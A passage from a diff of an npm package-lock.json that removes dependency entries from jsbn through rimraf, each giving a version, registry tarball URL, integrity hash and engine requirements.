"https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" - }, - "node_modules/jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==", - "engines": { - "node": ">= 10.16.0" - } - }, - "node_modules/jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", - "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", - "license": "MIT", - "dependencies": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - }, - "bin": { - "jsonpath": "bin/jsonpath-cli.js", - "jsonpath-plus": "bin/jsonpath-cli.js" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha1-vMbEmkKihA7Zl/Mj6tpezRguC/4=", - "dev": true - }, - "node_modules/make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "dependencies": { - "semver": "^7.5.3" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-dir/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", - "engines": { - "node": ">=16 || 14 >=14.17" - } - }, - "node_modules/minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "dependencies": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "engines": { - "node": ">= 18" - } - }, - "node_modules/mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==", - "bin": { - "mkdirp": "dist/cjs/src/bin.js" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "dependencies": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "dependencies": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "engines": { - "node": ">=16 || 14 >=14.18" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/path-scurry/node_modules/lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "node_modules/picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.1", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.1.tgz", - "integrity": "sha512-60e/YWs2/D3MV1ErdjhJHcmlgnyLUiG4X/14dgsfm9/zmCWLN16xI6YqJYSCd/OANM7bUNzJqPY5B8/02S9Ibw==" - }, - "node_modules/rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "dependencies": { - "glob": "^10.3.7" - }, - "bin": { - "rimraf": "dist/esm/bin.mjs" - }, - "funding": { - "url": 